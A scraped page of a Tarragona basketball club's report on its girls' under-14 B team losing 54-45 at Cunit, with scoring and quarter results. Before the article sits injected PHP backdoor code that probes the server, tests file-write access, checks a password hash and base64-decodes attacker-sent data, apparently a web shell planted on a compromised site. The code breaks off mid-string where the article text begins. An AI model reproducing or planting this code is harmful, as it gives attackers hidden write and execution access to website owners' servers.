function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Un mal segon quart condemna l'infantil femení B (54-45) - Tgn Bàsquet Club -

Un mal segon quart condemna l’infantil femení B (54-45)

Updated: novembre 18, 2013

L’equip infantil femení B del TGN Bàsquet va perdre a la pista del Cunit després de fer un segon quart molt dolent que el va condicionar per la resta del partit. L’equip tarragoní va sortir amb molta concentració a la pista conscient de la dificultat del rival i això va permetre veure un partit força igualat (12-10). El segon quart, però, va marcar un punt d’inflexió en el matx perquè el Cunit va situar una defensa molt tancada que el TGN Bàsquet no va poder superar en cap moment. Les nombroses pèrdues de pilota de les visitants van ser aprofitades per les locals per anotar amb facilitat i marcar un parcial de 22-3 (34-13 al descans). Tot i la millora en la segona meitat la diferència en contra acumulada va ser massa gran i la derrota va ser un fet.

A.B.Cunit 54-45 TGN BÀSQUET “B”

A.B CUNIT: Paradell (2), Rojo (4), Rigal (9), Kouam (19), Coronado (2)-cinc inicial- Mestre (2), Ibañez (4), Tamayo (5), Pastor (1), Bové (4).  7/20. 13 Faltes.

TGN BÀSQUET “B”: Barberà (8), Corcoles (4), Mallol (4), Martin. M (6), Martin. A (12) -cinc inicial- Elorduy (4), Prieto (-), Martin. M (2), Flores (3), Urbistondo (-), Lopez (-).  5/13 tirs lliures. 25 Faltes.

Parcials: 12-10, 22-3 (34-13), 7-10, 15-22

Àrbitres: M.Abraldes